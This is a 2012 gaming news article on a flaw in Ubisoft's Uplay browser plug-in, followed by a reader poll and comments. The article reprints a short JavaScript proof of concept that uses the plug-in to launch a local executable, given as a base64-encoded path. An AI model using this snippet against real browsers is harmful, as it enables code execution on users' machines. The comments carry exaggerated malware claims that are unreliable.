News

Ubisoft's Uplay blasted as 'rootkit', installs 'unsecure' browser plug-in [UPDATE]
Posted: 30.07.2012 11:45 by Simon Priest Comments: 7
Some coding enthusiasts have discovered a little something in Ubisoft's Uplay platform for PC leading others to blast it as a 'rootkit'. It stealthily installs a browser plug-in which isn't secure.

The plugin granted its discoverer "unexpectedly (at least to me) wide access" to websites. It's a rather embarrassing hiccup if true.

Naturally this oversight has upset a lot of PC users who have long railed against Ubisoft's PC DRM software suite.

UPDATE: Trend Micro's Rik Ferguson, director of the security research firm, has said it's "not a malicious root, just really bad code." It's "a huge risk" .

"This certainly looks like an easily exploitable software flaw, but I'm not sure I would go as far as calling it a rootkit," commented director Ferguson. Ubisoft's Uplay is a mandatory install for any of their PC titles meaning everyone is put at risk. The real problem is that the exploit has now gone public.

"The reports state the exploitable code is in the form of a browser plugin, the plugin does not attempt to hide its presence on your system and can be relatively simply disabled. It's not a malicious root, just really bad code," he continued.

Ubisoft must fix this 'backdoor' immediately urged Fergusson. "Pushing out such easily exploitable code, to such an easily targeted platform as a web browser through such a huge gaming population presents a huge risk and will of course be of interest to online criminals," he gravely warned, speaking with CVG.

"Ubisoft should be patching this code as a matter of urgency and in the meantime, gamers should be disabling the plug-in."

Original story follows

Essentially the plugin exposes users to action (potentially) by third-parties without any confirmation or consent being needed. A simple trip into your browser's security settings though can easily disable the offending plug-in. The exploit revolves around ActiveX controls.

The reason people seem to label this a rootkit is because there's no mention of a plug-in to be installed. By definition a rootkit is a "stealthy type of malicious software (malware) designed to hide the existence of certain processes or programs from normal methods of detection and enable continued privileged access to a computer."

The troublesome code:

x = document.createElement('OBJECT');
x.type = "application/x-uplaypc";
document.body.appendChild(x);
x.open("-orbit_product_id 1 -orbit_exe_path
QzpcV0lORE9XU1xTWVNURU0zMlxDQUxDLkVYRQ== -uplay_steam_mode -uplay_dev_mode
-uplay_dev_mode_auto_play")

Of course Ubisoft's Uplay hasn't done this with malicious intent, as some would accuse, but this type of coding slip up would certainly incriminate software released by an independent programmer. A degree of hysteria surrounds the exploit leading to accusations that it makes a PC highly vulnerable.

Simply disable the browser plugin if you're concerned. Here's the original discovery.

We've contacted Ubisoft for comment.
Source: NeoGAF

Browse Polls   

POLL:

Do you have Uplay installed on your PC? 27 votes

Yes, I own Ubisoft PC games

VOTE

No, my PC is free and clear

VOTE

I did but not anymore!

VOTE

Comments

By nocutius (SI Elite) on Jul 30, 2012
nocutius
Thanks for the info.
By herodotus (SI Herodotus) on Jul 30, 2012
herodotus
Hmmmm. Must check this out. The only bugbear I've heard many have are the two nasty and impossible to eradicate viruses currently infecting many a PC that use P2P for patching and mod downloading (and possibly naughty things) - "Google Redirect" and "Recomended for you". The only way to get rid of them is a complete re-format, and I've read some terrible horror stories about them.
So UPlay's "rootkit" is the least of worries.
By nocutius (SI Elite) on Jul 30, 2012
nocutius
What do you mean about Google? Any links/explanation to clarify bit?
By herodotus (SI Herodotus) on Jul 30, 2012
herodotus
"Google redirect virus" is one of most annoying, dangerous and toughest infections ever released on the internet. This virus redirect google search results or normal website links to a malicious webpage which is related to some sort of advertisement or a page which enable hackers to gain information from you. Apart from google redirect virus, it is also called Yahoo Redirect Virus or Bing Redirect Virus, based on which search engine is infected. Most recently a modification of this infection has popped up as Nginx Redirect Virus and Happili Redirect Virus.
In reality, all are the same.
Not many PC users know that Google redirect virus is not a virus, but in fact a rootkit. Rootkit infections unlike virus, spyware or trojan infections are very difficult to remove. In very rare cases, the google redirect virus rootkit is seen associated with Trojans which makes it more deadly. According to a 2011 report, Google redirect virus has already infected 45,00,000 computers wide, out of which 1/3rd is from US.

While eradicating it is nigh on impossible (despite the many "solutions" on the web) having AVAST 7.0 sometimes blocks malicious sites. It does not matter what security suite you have installed, this rootkit has been programmed to recognise all Anti-Virus, Anti-Malware and Anti-Spybot scans that look for it, and disguise itself so it can't be "seen".

An example. If I were to click on "News" after posting this to return me to the News page, I would instead be redirected to a malicious webpage. That's how bad it is. Eventually your PC slows to a crawl, infested with multiple viruses and trojans and stops to work completely (if you haven't been robbed of your life's savings by that time).

Google redirect virus is tough to remove because of its ability to hide deep inside operating systems and also remove traces and footprints on how it got inside your computer. As of today, not even a single security software suite ion the market can guarantee you 100% protection from this infection.

I recommend the following be installed on everyone's PC:

1. Spybot S&D
2. Malwarebytes Anti-Malware
3. SUPERAntiSpyware

All are free, and offer the best protection and eradication currently available.
As far as Anti-Virus, I recommend using AVAST 7.0 (web browsing protection is great) or Microsoft Security Essentials.

Despite what many say, there is NO need to pay for an Anti-virus suite and many professional programmers swear they don't even use the free ones, that is they do not have on AV program installed, not one. It is Malware and Spyware that you really NEED to protect yourself from.
By herodotus (SI Herodotus) on Jul 30, 2012
herodotus
Thanks Jonah.
By nocutius (SI Elite) on Jul 30, 2012
nocutius
Thanks for the time hero, i misunderstood you as i thought that google is doing something nasty again.

I guess i've been lucky so far.

Thanks for the recommendations about the anti spyware software too.
I've not heard of the last program but i've already been using the first two, will give the other one a go as well.